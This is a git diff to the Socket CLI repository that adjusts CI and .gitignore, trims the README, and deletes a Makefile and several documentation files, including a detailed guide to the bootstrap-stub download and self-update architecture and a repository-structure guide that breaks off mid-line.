diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index d833940e3..e5743a087 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -36,8 +36,11 @@ jobs: uses: SocketDev/socket-registry/.github/workflows/ci.yml@1a96ced97aaa85d61543351b90d6f463b983c46c # main with: test-setup-script: 'pnpm --filter @socketsecurity/cli... run build' + # The check script runs both lint and type checking, so we need dependencies built. + lint-setup-script: 'pnpm --filter @socketsecurity/cli... run build' lint-script: 'pnpm --filter @socketsecurity/cli run check' - type-check-script: 'pnpm --filter @socketsecurity/cli run type' + # Skip redundant type-check since check script already runs it. + run-type-check: false run-test: false # Tests run in separate sharded job below. node-versions: ${{ inputs.node-versions || '["24.10.0"]' }} os-versions: '["ubuntu-latest"]' diff --git a/.gitignore b/.gitignore index b74abda72..71e4bd0ea 100644 --- a/.gitignore +++ b/.gitignore @@ -8,6 +8,7 @@ Thumbs.db /.rollup.cache /.vscode /external +/.node-version /npm-debug.log /yarn.lock /yarn.log diff --git a/.node-version b/.node-version deleted file mode 100644 index a45fd52cc..000000000 --- a/.node-version +++ /dev/null @@ -1 +0,0 @@ -24 diff --git a/Makefile b/Makefile deleted file mode 100644 index ba4e708d3..000000000 --- a/Makefile +++ /dev/null @@ -1,20 +0,0 @@ -# Makefile for Socket Mach-O compression tools -CXX := /usr/bin/clang++ -CXXFLAGS := -std=c++17 -O3 -Wall -Wextra -mmacosx-version-min=11.0 -LDFLAGS := -lcompression - -all: socket_macho_compress socket_macho_decompress - -socket_macho_compress: socket_macho_compress.cc - $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) - @echo "✅ Built socket_macho_compress" - -socket_macho_decompress: socket_macho_decompress.cc - $(CXX) $(CXXFLAGS) -o $@ $< $(LDFLAGS) - @echo "✅ Built socket_macho_decompress" - -clean: - rm -f socket_macho_compress socket_macho_decompress - @echo "✅ Cleaned" - -.PHONY: all clean diff --git a/README.md b/README.md index 4dd404cf4..1b02869b4 100644 --- a/README.md +++ b/README.md @@ -100,11 +100,6 @@ Supports version 2 format with `projectIgnorePaths` for excluding files from rep ## Contributing -**New to Socket CLI development?** - -- **Quick Start (10 min)**: [Getting Started Guide](docs/getting-started.md) — Essential setup and first contribution -- **Detailed Guide**: [Development Getting Started](docs/development/getting-started.md) — Complete end-to-end onboarding - **Quick setup:** ```bash @@ -115,16 +110,6 @@ pnpm run build pnpm exec socket --version ``` -### Building locally - -Socket CLI uses an **intelligent build system with automatic caching** that only rebuilds packages when their source files change. The build system ensures packages are built in the correct dependency order: - -1. **Yoga WASM** - Terminal layout engine (tables, progress bars) -2. **CLI Package** - TypeScript compilation and bundling -3. **SEA Binary** - Node.js Single Executable Application - -> **Note**: ONNX Runtime WASM is temporarily disabled due to build issues. AI features use pre-built assets. - #### Quick start (easiest) The default build command automatically skips packages that are already up-to-date: @@ -221,9 +206,6 @@ pnpm run build --platforms --parallel Build individual packages directly with pnpm filters: ```bash -# Build ONNX Runtime WASM (for AI features) -pnpm --filter @socketsecurity/onnxruntime run build - # Build Yoga WASM (for terminal layouts) pnpm --filter @socketsecurity/yoga run build @@ -240,8 +222,6 @@ pnpm --filter @socketbin/node-sea-builder-builder run build pnpm run build --help ``` -See [docs/development/](docs/development/) for detailed development guides. - ### Development environment variables - `SOCKET_CLI_API_BASE_URL` - API base URL (default: `https://api.socket.dev/v0/`) @@ -435,7 +415,6 @@ try { - [Socket API Reference](https://docs.socket.dev/reference) - [Socket GitHub App](https://github.com/apps/socket-security) -- [`@socketsecurity/sdk`](https://github.com/SocketDev/socket-sdk-js) [Socket.dev]: https://socket.dev/ diff --git a/docs/README.md b/docs/README.md deleted file mode 100644 index 4fa25fa72..000000000 --- a/docs/README.md +++ /dev/null @@ -1,79 +0,0 @@ -# Socket CLI Documentation - -## New to Socket CLI Development? - -**Choose your path:** - -- **[Quick Start (10 min)](getting-started.md)** — Essential setup and first contribution -- **[Detailed Guide](development/getting-started.md)** — Complete end-to-end onboarding with troubleshooting - -The detailed guide includes: -- Prerequisites and installation -- Development workflow -- Testing strategies -- Troubleshooting guide - -## Documentation Organization - -📚 **[Documentation Organization Guide](documentation-organization.md)** - Complete guide to Socket CLI's 3-tier documentation hierarchy - -### Categories - -- **architecture/** - System design documents and flow diagrams -- **build/** - Node.js build system and patching documentation -- **configuration/** - Shared configuration architecture -- **development/** - Development tools and workflow -- **guides/** - User-facing how-to guides -- **performance/** - Performance optimization guides -- **technical/** - Low-level implementation details -- **testing/** - Testing strategies and guides - -## Quick Links - -### Architecture -- [Bootstrap/stub architecture](architecture/bootstrap-stub.md) -- [Repository structure](architecture/repository.md) -- [Stub execution flow](architecture/stub-execution.md) -- [Stub package](architecture/stub-package.md) -- [Unified binary design](architecture/unified-binary.md) - -### Build System -- [Build System Guide](build/README.md) - **Start here** - Complete build system overview -- [Build/dist structure](build/build-dist-structure.md) - Output directory structure -- [Caching strategy](build/caching-strategy.md) - How build caching works -- [WASM build guide](build/wasm-build-guide.md) - Building WASM packages -- [Node.js build quick reference](build/node-build-quick-reference.md) - Troubleshooting custom Node.js builds -- [Node.js patch creation guide](build/node-patch-creation-guide.md) - Creating Socket patches for Node.js -- [Node.js patch metadata](build/node-patch-metadata.md) - Patch metadata format -- [Node.js build order](build/node-build-order-explained.md) - Understanding patch application order - -### Configuration -- [Configuration migration guide](configuration/configuration-migration.md) -- [Configuration summary](configuration/configuration-summary.md) -- [Shared configuration architecture](configuration/shared-configuration-architecture.md) - -### Development -- [Getting started](development/getting-started.md) - Complete onboarding guide for new contributors -- [Babel plugins](development/babel-plugins.md) -- [Development linking](development/linking.md) -- [Platform support](development/platform-support.md) - -### Guides -- [CI setup for yao-pkg](guides/yao-pkg-ci.md) -- [Test yao-pkg binary](guides/testing-yao-pkg.md) - -### Performance -- [Build performance](performance/performance-build.md) -- [CI performance](performance/performance-ci.md) -- [Testing performance](performance/performance-testing.md) - -### Technical Details -- [Manifest management](technical/manifest-management.md) - Complete manifest API reference -- [Manifest extensions](technical/manifest-extensions.md) - Proposed future features -- [Metadata files](technical/metadata-files.md) - Metadata file formats -- [Patch cacache](technical/patch-cacache.md) - Patch backup and caching system - -### Testing -- [Local testing](testing/local-testing.md) -- [Smart test selection](testing/smart-test-selection.md) -- [Testing custom Node.js](testing/testing-custom-node.md) diff --git a/docs/architecture/bootstrap-stub.md b/docs/architecture/bootstrap-stub.md deleted file mode 100644 index d9a2c5819..000000000 --- a/docs/architecture/bootstrap-stub.md +++ /dev/null @@ -1,650 +0,0 @@ -# Bootstrap Stub Architecture - -This document describes Socket CLI's bootstrap stub architecture for distributing minimal executables that download the full CLI on first run. - -## Overview - -Socket CLI uses a **bootstrap stub pattern** where the distributed executable is a tiny wrapper (~1-5MB) that downloads the full CLI (~20MB) on first use. The stub remains "dumb" - its only job is to download and spawn the full CLI. The full CLI (in `~/.socket/_dlx/`) handles all functionality including updating both itself and the stub. - -This provides: - -- **Minimal download size**: Users download ~1-5MB stub vs ~20MB full CLI -- **Automatic updates**: CLI can self-update and update the stub without redistributing executables -- **Platform independence**: Same architecture works for SEA, yao-pkg, and standalone binaries -- **Disk efficiency**: One shared CLI installation for multiple users (system-wide installs) -- **Robust versioning**: SHA256 hash verification ensures stub integrity - -## Architecture Diagram - -``` -┌─────────────────────────────────────────────────────────┐ -│ Distributed Stub (~1-5MB) │ -│ │ -│ ┌───────────────────────────────────────────────────┐ │ -│ │ Bootstrap Stub (src/sea/bootstrap.mts) │ │ -│ │ │ │ -│ │ • Node.js runtime (embedded, minimal) │ │ -│ │ • Ultra-thin wrapper (~280 lines) │ │ -│ │ • No external dependencies │ │ -│ │ • Computes own SHA256 hash │ │ -│ └───────────────────────────────────────────────────┘ │ -└─────────────────────────────────────────────────────────┘ - │ - │ First run - ▼ -┌─────────────────────────────────────────────────────────┐ -│ npm Registry (registry.npmjs.org) │ -│ │ -│ @socketsecurity/cli@latest (~20MB) │ -└─────────────────────────────────────────────────────────┘ - │ - │ Download & extract - ▼ -┌─────────────────────────────────────────────────────────┐ -│ ~/.socket/_dlx/ (User's home directory) │ -│ │ -│ ├── package.json │ -│ ├── dist/ │ -│ │ ├── cli.js (Main entry point - SMART) │ -│ │ ├── commands/self-update/ (Can update CLI+stub) │ -│ │ ├── utils.js │ -│ │ ├── vendor.js │ -│ │ └── external/ │ -│ ├── node_modules/ (Installed dependencies) │ -│ ├── requirements.json │ -│ ├── translations.json │ -│ └── shadow-bin/ │ -└─────────────────────────────────────────────────────────┘ - │ - │ Subsequent runs (with IPC) - ▼ -┌─────────────────────────────────────────────────────────┐ -│ System Node.js (from PATH) │ -│ │ -│ $ node ~/.socket/_dlx/dist/cli.js [args] │ -│ │ -│ IPC Channel receives from stub: │ -│ • SOCKET_CLI_STUB_PATH (e.g., /usr/local/bin/socket)│ -│ • SOCKET_CLI_STUB_HASH (SHA256) │ -│ • SOCKET_CLI_STUB_SIZE (bytes) │ -└─────────────────────────────────────────────────────────┘ -``` - -## Bootstrap Launcher Implementation - -### Location - -`src/sea/bootstrap.mts` - Ultra-thin bootstrap wrapper - -### Key Features - -1. **Zero external dependencies** - Only Node.js built-ins (fs, path, crypto, child_process) -2. **Minimal code** - ~250 lines including comments and safety checks -3. **Configurable** - Environment variables for custom registries and paths -4. **Safe** - Path traversal protection, atomic operations -5. **Fast** - Parallel downloads, efficient extraction - -### Bootstrap Flow - -```mermaid -flowchart TD - A[User runs socket executable] --> B{CLI installed?} - B -->|No| C[Download @socketsecurity/cli from npm] - B -->|Yes| H[Get installed version] - C --> D[Extract tarball to ~/.socket/tmp/] - D --> E[Run npm install --production] - E --> F[Move to ~/.socket/_dlx/] - F --> G[Read package.json for entry point] - H --> G - G --> I[Spawn: node ~/.socket/_dlx/dist/cli.js args] - I --> J[Forward all stdio] - J --> K[Exit with CLI exit code] -``` - -### Configuration - -Environment variables for customization: - -| Variable | Default | Description | -|----------|---------|-------------| -| `SOCKET_HOME` | `~/.socket` | Root directory for Socket CLI data | -| `SOCKET_CLI_DIR` | `~/.socket/_dlx` | CLI installation directory | -| `SOCKET_CLI_PACKAGE` | `@socketsecurity/cli` | npm package name | -| `SOCKET_NPM_REGISTRY` | `https://registry.npmjs.org` | npm registry URL | -| `NPM_REGISTRY` | (fallback) | Alternative registry env var | - -### Example Usage - -```bash -# First run - downloads CLI -$ ./socket --version -First run detected. Downloading Socket CLI from npm... -Downloading @socketsecurity/cli@1.1.24 from npm... -Installing dependencies... -Socket CLI downloaded successfully! -socket/1.1.24 - -# Subsequent runs - uses cached CLI -$ ./socket scan create -[Normal CLI output...] -``` - -## Installation Locations - -### Default Paths - -- **Linux/macOS**: `~/.socket/_dlx/` -- **Windows**: `%USERPROFILE%\.socket\cli\` - -### Directory Structure - -``` -~/.socket/ -├── _cli/ # Downloaded CLI installation -│ ├── package.json # CLI package metadata -│ ├── dist/ # Rollup distribution -│ │ ├── cli.js # Main entry point -│ │ ├── npm-cli.js # npm wrapper -│ │ ├── npx-cli.js # npx wrapper -│ │ ├── constants.js -│ │ ├── utils.js -│ │ ├── vendor.js # Bundled dependencies -│ │ ├── external/ # External dependencies -│ │ │ ├── @socketsecurity/ -│ │ │ └── ink/ -│ │ └── types/ # TypeScript definitions -│ ├── node_modules/ # Installed dependencies -│ ├── requirements.json # Package requirements -│ ├── translations.json # i18n translations -│ └── shadow-bin/ # Shadow binaries -│ ├── npm -│ └── npx -└── tmp/ # Temporary download directory - └── [hash]/ # Per-version temp dir - └── package.tgz # Downloaded tarball -``` - -### Disk Usage - -| Component | Size | Notes | -|-----------|------|-------| -| Bootstrap executable | ~1MB | Distributed to users | -| Downloaded CLI | ~30MB | Cached in `~/.socket/_dlx/` | -| node_modules/ | ~15MB | Production dependencies only | -| **Total** | **~45MB** | One-time download | - -## Self-Update Architecture - -### Overview - -Socket CLI implements a **two-tier update system**: - -1. **CLI Self-Update**: The full CLI (`~/.socket/_dlx/`) can update itself -2. **Stub Update**: The CLI can also update the stub binary that launched it - -The stub remains "dumb" and never updates itself. All update logic lives in the full CLI. - -### IPC Communication Flow - -``` -┌──────────────────────┐ -│ Stub Binary │ -│ (socket executable) │ -│ - DUMB: only knows │ -│ its own location │ -└──────────────────────┘ - │ - │ 1. Spawn CLI with IPC channel - │ stdio: ['inherit', 'inherit', 'inherit', 'ipc'] - │ - │ 2. Send stub location via IPC - │ { SOCKET_CLI_STUB_PATH: process.argv[0] } - ▼ -┌──────────────────────────────────────┐ -│ Full CLI (~/.socket/_dlx/dist/cli.js) │ -│ - SMART: handles all logic │ -├──────────────────────────────────────┤ -│ Receives via IPC: │ -│ • SOCKET_CLI_STUB_PATH │ -│ │ -│ On self-update: │ -│ 1. Check CLI version │ -│ 2. Download new CLI if needed │ -│ 3. Read stub at STUB_PATH │ -│ 4. Compute SHA256 hash │ -│ 5. Compare vs known-good hashes │ -│ 6. Download new stub if outdated │ -│ 7. Atomically replace stub binary │ -└──────────────────────────────────────┘ -``` - -### Stub Sends Location Only - -The stub only sends its own location - it doesn't compute hashes or sizes: - -```typescript -// In bootstrap.mts (lines 259-266) -child.on('spawn', () => { - const stubPath = process.argv[0] - if (stubPath) { - child.send?.({ - SOCKET_CLI_STUB_PATH: stubPath, - }) - } -}) -``` - -This keeps the stub **ultra-minimal** - all intelligence lives in the CLI. - -### CLI Receives Stub Location - -The CLI receives only the stub path via IPC (implemented in `src/utils/stub-ipc.mts` and `src/cli.mts`): - -```typescript -// In constants.mts (lines 222-231) -export type IpcObject = Readonly<{ - // ... other IPC fields - SOCKET_CLI_STUB_PATH?: string | undefined -}> - -// In cli.mts - Initialize at startup -initStubIpcHandler() - -// In stub-ipc.mts - Store received path -let stubPath: string | undefined - -process.on('message', (message: unknown) => { - if (message && typeof message === 'object' && 'SOCKET_CLI_STUB_PATH' in message) { - stubPath = (message as IpcObject).SOCKET_CLI_STUB_PATH - } -}) - -// Export getter for other modules -export function getStubPath(): string | undefined { - return stubPath -} -``` - -### CLI Computes Hash When Needed - -The CLI reads and hashes the stub only when checking for updates (in `src/commands/self-update/handle-self-update.mts`): - -```typescript -// Get stub path from IPC -const stubPath = getStubPath() - -if (stubPath && existsSync(stubPath)) { - // Read stub binary - const stubContent = await fs.readFile(stubPath) - - // Compute hash - const currentHash = crypto.createHash('sha256') - .update(stubContent) - .digest('hex') - - // Compare against available stub assets in release - // ... rest of update logic -} -``` - -### Stub Update Process - -When `socket self-update` runs (implemented in `src/commands/self-update/handle-self-update.mts`): - -```typescript -// Get stub path from IPC (received at CLI startup) -const stubPath = getStubPath() - -if (stubPath && existsSync(stubPath)) { - // 1. Read current stub binary and compute hash - const stubContent = await fs.readFile(stubPath) - const currentHash = crypto.createHash('sha256') - .update(stubContent) - .digest('hex') - - logger.info(`Current stub hash: ${currentHash}`) - - // 2. Check if stub asset exists in GitHub release - const stubAssetName = `socket-stub-${process.platform}-${process.arch}${process.platform === 'win32' ? '.exe' : ''}` - const stubAsset = release.assets.find(asset => asset.name === stubAssetName) - - if (stubAsset) { - // 3. Download new stub - await downloadFile(stubAsset.browser_download_url, downloadPath) - - // 4. Create backup of current stub - const backupPath = await createBackup(stubPath) - - // 5. Atomically replace stub binary - await replaceBinary(stagingPath, stubPath) - - logger.info('✓ Bootstrap stub updated successfully!') - } else { - logger.info('No stub binary found in release') - } -} -``` - -**Implementation Notes:** -- Stub update is called automatically during `socket self-update` -- Works even if CLI is already up-to-date (checks stub independently) -- Uses same atomic replacement logic as CLI binary updates -- Creates backups with rollback capability on failure -- Verifies stub integrity using SHA256 checksums from release metadata -- Downloads from HTTPS + GitHub releases with cryptographic hash verification - -### Atomic Stub Replacement - -Similar to SEA binary updates (from `handle-self-update.mts:192-227`): - -```typescript -async function replaceStub(newPath: string, currentPath: string): Promise { - // Ensure executable and clear macOS quarantine - await ensureExecutable(newPath) - await clearQuarantine(newPath) - - if (process.platform === 'win32') { - // Windows: Move current to temp, then replace - const tempName = `${currentPath}.old.${Date.now()}` - await fs.rename(currentPath, tempName) - - try { - await fs.rename(newPath, currentPath) - await remove(tempName).catch(() => {}) - } catch (error) { - // Restore on failure - await fs.rename(tempName, currentPath).catch(() => {}) - throw error - } - } else { - // Unix: Atomic rename - await fs.rename(newPath, currentPath) - } -} -``` - -### Security Considerations - -#### Hash-Based Verification - -- **Algorithm**: SHA256 (256-bit, cryptographically secure) -- **Performance**: ~5ms for 5KB stub, ~20ms for 20MB CLI -- **Integrity**: Detects any bit-level corruption or tampering - -#### Known-Good Hashes - -Stub hashes are stored in: -1. **npm package metadata**: `@socketsecurity/cli` package.json -2. **GitHub release assets**: `stub-hashes.json` in each release -3. **Embedded in CLI**: Compiled-in hash map for offline verification - -Example `stub-hashes.json`: -```json -{ - "1.1.24": { - "darwin-arm64": "81b27bcc09c973dd2a4d1edd1b1b963eb3ee7f363c32fc889ba5f7ac3f37ad55", - "darwin-x64": "f3a8c2b9...", - "linux-arm64": "9d4e5f1a...", - "linux-x64": "2c7b8d3e...", - "win32-x64": "6a1f9c4b..." - } -} -``` - -### Manual Updates - -Users can manually update: - -```bash -# Update CLI only (stub checks and downloads if needed) -socket self-update - -# Force re-download CLI (stub will re-download on next run) -rm -rf ~/.socket/_dlx -socket --version - -# Clean everything including temp files -rm -rf ~/.socket -socket --version -``` - -## Security Considerations - -### Package Integrity - -**Current:** -- Downloads from official npm registry (`registry.npmjs.org`) -- npm registry provides SHA integrity checks -- HTTPS transport encryption - -**Future Enhancements:** -- GPG signature verification of tarballs -- Subresource Integrity (SRI) for downloads -- Pinned version with hash verification - -### Path Safety - -Bootstrap includes path traversal protection: - -```javascript -// Prevents ../../../etc/passwd type attacks -if (!options?.force) { - const cwd = process.cwd() - const relation = path.relative(cwd, absolutePath) - const isInside = Boolean( - relation && - relation !== '..' && - !relation.startsWith(`..${path.sep}`) - ) - if (!isInside) { - throw new Error('Cannot delete files/directories outside cwd') - } -} -``` - -### Atomic Operations - -1. **Download to temp directory** (`~/.socket/tmp/[hash]/`) -2. **Extract and install** in temp location -3. **Atomic move** to final location -4. **Cleanup** temp on success or failure - -This prevents corrupted installations from partial downloads. - -## Platform Support - -### Supported Platforms - -| Platform | Support | Notes | -|----------|---------|-------| -| Linux x64 | ✅ Full | Primary platform | -| Linux ARM64 | ✅ Full | Raspberry Pi, AWS Graviton | -| macOS x64 | ✅ Full | Intel Macs | -| macOS ARM64 | ✅ Full | Apple Silicon | -| Windows x64 | ✅ Full | Requires system Node.js | -| Windows ARM64 | ⚠️ Limited | Experimental | - -### Platform-Specific Notes - -**macOS:** -- SEA executables are code-signed for Gatekeeper -- Ad-hoc signatures for local development -- Developer ID signatures for distribution - -**Windows:** -- Requires `tar` command (built-in on Windows 10+) -- Executable signing via `signtool` (optional) -- May trigger SmartScreen on first run (unsigned) - -**Linux:** -- Works on all major distributions -- No additional dependencies required -- AppImage support (future) - -## Build Variants - -Socket CLI supports multiple build variants with the same bootstrap architecture: - -### 1. SEA (Single Executable Application) - -**Size:** ~60-80MB -**Bootstrap:** Embedded in Node.js runtime -**Pros:** -- Official Node.js feature -- Good compression -- Native WASM support - -**Cons:** -- Larger than yao-pkg -- Slower build time - -### 2. yao-pkg (Package as executable) - -**Size:** ~44MB (macOS), ~22-31MB (Linux/Windows with UPX) -**Bootstrap:** Can be embedded or separate -**Pros:** -- Excellent compression (with UPX) -- Fast builds -- Mature tooling - -**Cons:** -- Requires custom Node.js build -- Community-maintained fork - -### 3. Standalone (npm install) - -**Size:** ~30MB (no bootstrap) -**Bootstrap:** Not applicable -**Pros:** -- No bundling overhead -- Standard npm workflow -- Easiest updates - -**Cons:** -- Requires Node.js pre-installed -- Slower startup (module resolution) - -## Comparison with Full Bundle - -| Metric | Bootstrap | Full Bundle | Difference | -|--------|-----------|-------------|------------| -| **Download size** | ~1MB | ~30MB | **97% smaller** | -| **First run time** | ~10s | <1s | Slower (download) | -| **Subsequent runs** | <1s | <1s | Same | -| **Disk usage** | ~45MB | ~30MB | +15MB (node_modules) | -| **Update method** | Delete cache | Redownload | Simpler | -| **Offline support** | After 1st run | Always | Limited | - -## Error Handling - -### Common Errors - -**No Node.js in PATH:** -``` -Error: Node.js is required to run Socket CLI -The SEA wrapper has downloaded the CLI but needs Node.js to execute it. -Please install Node.js from https://nodejs.org/ -``` - -**Network errors:** -``` -Failed to fetch package info: 404 Not Found -``` - -**Disk space:** -``` -ENOSPC: no space left on device -``` - -**Permissions:** -``` -EACCES: permission denied, mkdir '~/.socket/_dlx' -``` - -### Recovery - -Users can manually recover from errors: - -```bash -# Clean up corrupted installation -rm -rf ~/.socket/_dlx -rm -rf ~/.socket/tmp - -# Retry -socket --version -``` - -## Testing - -### Local Testing - -Test the bootstrap locally before distribution: - -```bash -# Build bootstrap bundle -pnpm run build --sea - -# Test first run (delete cache first) -rm -rf ~/.socket/_dlx -./socket --version - -# Test subsequent run -./socket --version - -# Test with custom registry -SOCKET_NPM_REGISTRY=http://localhost:4873 ./socket --version -``` - -### CI Testing - -Test bootstrap in CI: - -```yaml -- name: Test bootstrap launcher - run: | - # Build executable - pnpm run build --sea - - # Test first run - rm -rf ~/.socket/_dlx - ./socket --version - - # Verify installation - test -d ~/.socket/_dlx - test -f ~/.socket/_dlx/package.json - - # Test subsequent run - ./socket --help -``` - -## Future Enhancements - -### Planned Features - -1. **Background updates**: Check for updates in background, download asynchronously -2. **Version pinning**: Lock to specific CLI version via config file -3. **Multi-version support**: Keep multiple CLI versions, switch via `socket use 1.2.3` -4. **Offline mode**: Bundle minimal CLI in executable as fallback -5. **Compression**: Use brotli/zstd for faster downloads -6. **Delta updates**: Download only changed files between versions -7. **Mirror support**: Fallback mirrors for registry downtime -8. **Telemetry**: Anonymous usage statistics for download success rates - -### Alternative Architectures - -**Hybrid bundle:** -- Include minimal CLI in executable (~5MB) -- Download full CLI on first use of advanced features -- Best of both worlds: fast startup + small size - -**Lazy loading:** -- Download commands on-demand -- `socket scan` downloads scan command only -- Reduces initial download to <100KB - -## References - -- Bootstrap implementation: `src/sea/bootstrap.mts` -- SEA documentation: `docs/SEA_PLATFORM_SUPPORT.md` -- yao-pkg documentation: `docs/YAO_PKG_BUILD.md` -- CI setup: `docs/YAO_PKG_CI_SETUP.md` diff --git a/docs/architecture/repository.md b/docs/architecture/repository.md deleted file mode 100644 index fb1d04ef2..000000000 --- a/docs/architecture/repository.md +++ /dev/null @@ -1,537 +0,0 @@ -# Socket CLI Repository Structure - -## Overview - -This document explains the organization of build artifacts, temporary files, and build scripts in the Socket CLI repository. - -## Directory Structure - -``` -socket-cli/ -├── .custom-node-build/ # Build artifacts (NOT in git) -│ ├── node-yao-pkg/ # Current Node.js v24.10.0 with yao-pkg patches -│ │ ├── out/Release/node # Built Node binary (~83MB) -│ │ └── ... # Node.js source (~19GB with build artifacts) -│ └── patches/ # Downloaded yao-pkg patches -│ └── node.v24.10.0.cpp.patch -├── pkg-binaries/ # pkg output binaries (NOT in git) -│ ├── socket-macos-arm64 # Built pkg executable (~90-110MB) -│ ├── socket-macos-x64 -│ ├── socket-linux-x64 -│ ├── socket-linux-arm64 -│ ├── socket-win-x64 -│ └── socket-win-arm64 -├── dist/ # Rollup output (NOT in git) -│ ├── cli.js # Bundled CLI code -│ ├── vendor.js # Bundled dependencies -│ └── ... -├── scripts/ # Build scripts (IN git) -│ ├── build.mjs # Main build script (rollup) -│ ├── build-yao-pkg-node.sh # Script to build custom Node.js -│ ├── babel/ # Custom Babel plugins -│ │ ├── babel-plugin-strict-mode.mjs -│ │ ├── babel-plugin-remove-icu.mjs -│ │ └── README.md -│ └── ... -├── patches/ # Socket CLI patches (IN git) -│ └── yoga-layout.patch # Patch for yoga-layout WASM -├── pkg.json # pkg configuration (IN git) -├── .gitignore # Ignores build artifacts -└── docs/ # Documentation (IN git) - ├── YAO_PKG_BUILD.md - ├── BABEL_PLUGINS.md - ├── PKG_PLATFORM_SUPPORT.md - └── REPOSITORY_STRUCTURE.md (this file) -``` - ---- - -## What's In Version Control (Git) - -### Source Code -- `src/` - TypeScript source files -- `test/` - Test files -- `scripts/` - Build scripts -- `patches/` - Socket CLI patches (yoga-layout, etc.) - -### Configuration Files -- `package.json` - npm package configuration -- `pnpm-lock.yaml` - Dependency lock file -- `pkg.json` - pkg/yao-pkg configuration -- `tsconfig.json` - TypeScript configuration -- `.config/` - Build tool configurations (rollup, babel, etc.) - -### Documentation -- `docs/` - All documentation files -- `README.md` - Main readme -- `CHANGELOG.md` - Version history -- `CLAUDE.md` - Development guidelines - -### CI/CD -- `.github/workflows/` - GitHub Actions workflows - ---- - -## What's NOT In Version Control (Gitignored) - -### Build Artifacts (Output) -```gitignore -dist/ # Rollup bundled output -pkg-binaries/ # pkg executable binaries -/socket # Built pkg binary in root -/socket-* # Built pkg binaries in root (any platform) -``` - -### Node.js Build Artifacts -```gitignore -.custom-node-build/ # All Node.js build files -``` - -**Why gitignored:** -- **Large size:** ~19-20GB per Node.js build with artifacts -- **Platform-specific:** Built binaries only work on target platform -- **Reproducible:** Can be rebuilt anytime from source using build script -- **Temporary:** Build artifacts change frequently - -### Dependency Directories -```gitignore -node_modules/ # npm/pnpm dependencies -.yarn/ # Yarn PnP files -.pnp.cjs # Yarn PnP loader -``` - -### Cache & Temporary Files -```gitignore -.rollup.cache/ # Rollup incremental build cache -.cache/ # Generic cache directory -**/.cache # Cache in any subdirectory -.type-coverage/ # Type coverage cache -*.tsbuildinfo # TypeScript incremental build info -``` - -### IDE & System Files -```gitignore -.vscode/ # VS Code settings (except extensions.json) -.DS_Store # macOS Finder metadata -Thumbs.db # Windows Explorer metadata -``` - -### Environment Files -```gitignore -.env # Local environment variables -.nvm/ # nvm Node version manager -.node-version # Node version pinning -``` - ---- - -## Build Artifact Locations - -### 1. Custom Node.js Build - -**Location:** `.custom-node-build/node-yao-pkg/` -**Size:** ~19-20GB (source + build artifacts) -**Binary:** `.custom-node-build/node-yao-pkg/out/Release/node` (~83MB) - -**Created by:** -```bash -pnpm run build:yao-pkg:node -# Runs: scripts/build-yao-pkg-node.sh -``` - -**What it does:** -1. Downloads Node.js v24.10.0 source from GitHub (~1.5GB) -2. Downloads yao-pkg patch from pkg-fetch repo (~33KB) -3. Applies patch to Node.js source -4. Configures with size optimizations -5. Builds with all CPU cores (~30-60 minutes) -6. Produces optimized Node binary (~83MB) - -**Cleanup:** -```bash -# Remove old/unused Node builds (saves ~40GB) -rm -rf .custom-node-build/node -rm -rf .custom-node-build/node-patched - -# Keep only current build -# .custom-node-build/node-yao-pkg -``` - -### 2. Socket CLI Distribution - -**Location:** `dist/` -**Size:** ~10-15MB -**Key files:** -- `dist/cli.js` - Main CLI entry point -- `dist/vendor.js` - Bundled dependencies -- `dist/constants.js` - CLI constants -- `dist/utils.js` - Utility functions - -**Created by:** -```bash -pnpm run build:cli -# Runs: rollup with .config/rollup.dist.config.mjs -``` - -**What it does:** -1. Compiles TypeScript to JavaScript -2. Bundles with rollup -3. Applies Babel transformations: - - Strict-mode conversion - - ICU removal (optional) - - `__proto__` transformations -4. Outputs to `dist/` - -**Cleanup:** -```bash -pnpm run clean:dist -# Removes dist/ directory -``` - -### 3. pkg Binaries - -**Location:** `pkg-binaries/` -**Size:** ~90-110MB per binary -**Files:** -- `socket-macos-arm64` - macOS Apple Silicon -- `socket-macos-x64` - macOS Intel -- `socket-linux-x64` - Linux x86_64 (most Docker) -- `socket-linux-arm64` - Linux ARM64 (AWS Graviton) -- `socket-win-x64.exe` - Windows x86_64 -- `socket-win-arm64.exe` - Windows ARM64 - -**Created by:** -```bash -pnpm run build:yao-pkg -# Runs: pnpm exec pkg . (uses pkg.json config) -``` - -**What it does:** -1. Reads `pkg.json` configuration -2. Uses custom Node.js binary from `.custom-node-build/node-yao-pkg/out/Release/node` -3. Bundles `dist/` files as V8 bytecode -4. Embeds assets in virtual filesystem -5. Creates standalone executables - -**Cleanup:** -```bash -rm -rf pkg-binaries/ -# Or keep only the platform you need -rm pkg-binaries/socket-win-* # Remove Windows binaries -rm pkg-binaries/socket-macos-* # Remove macOS binaries -``` - -### 4. Patches - -**Location:** `patches/` (IN git) and `.custom-node-build/patches/` (NOT in git) - -#### Socket CLI Patches (tracked) -``` -patches/ -└── yoga-layout.patch # Patch for yoga-layout WASM support -``` - -**Purpose:** Enable yoga-layout to work in pkg binaries by creating synchronous WASM entry point. - -**Applied by:** pnpm (automatically via `pnpm-lock.yaml`) - -#### yao-pkg Patches (not tracked) -``` -.custom-node-build/patches/ -└── node.v24.10.0.cpp.patch # Official yao-pkg patch for Node.js -``` - -**Purpose:** Enable V8 bytecode compilation in Node.js - -**Applied by:** `scripts/build-yao-pkg-node.sh` - -**Downloaded from:** https://github.com/yao-pkg/pkg-fetch - ---- - -## Disk Space Usage - -### Development Environment -``` -Total: ~50-60GB - -node_modules/ ~2-3 GB (dependencies) -.custom-node-build/ ~20-40 GB (Node.js builds) - ├── node-yao-pkg/ ~19-20 GB (current, keep) - ├── node-patched/ ~20 GB (old, can delete) - └── node/ ~20 GB (old, can delete) -dist/ ~10-15 MB (rollup output) -pkg-binaries/ ~500 MB (6 binaries × ~90MB) -``` - -### Minimal Build Environment -``` -Total: ~22-25GB - -node_modules/ ~2-3 GB -.custom-node-build/ ~19-20 GB (only node-yao-pkg) -``` - -### CI/CD Environment -``` -Total: ~5-10GB - -node_modules/ ~2-3 GB -Pre-built Node binary ~83 MB (download from release) -dist/ ~10-15 MB -pkg-binaries/ ~90-110 MB per platform -``` - ---- - -## Cleanup Scripts - -### Remove Old Node Builds - -```bash -#!/usr/bin/env bash -# scripts/cleanup-old-node-builds.sh - -echo "Removing old Node.js builds..." - -# Remove old v22 builds -rm -rf .custom-node-build/node -rm -rf 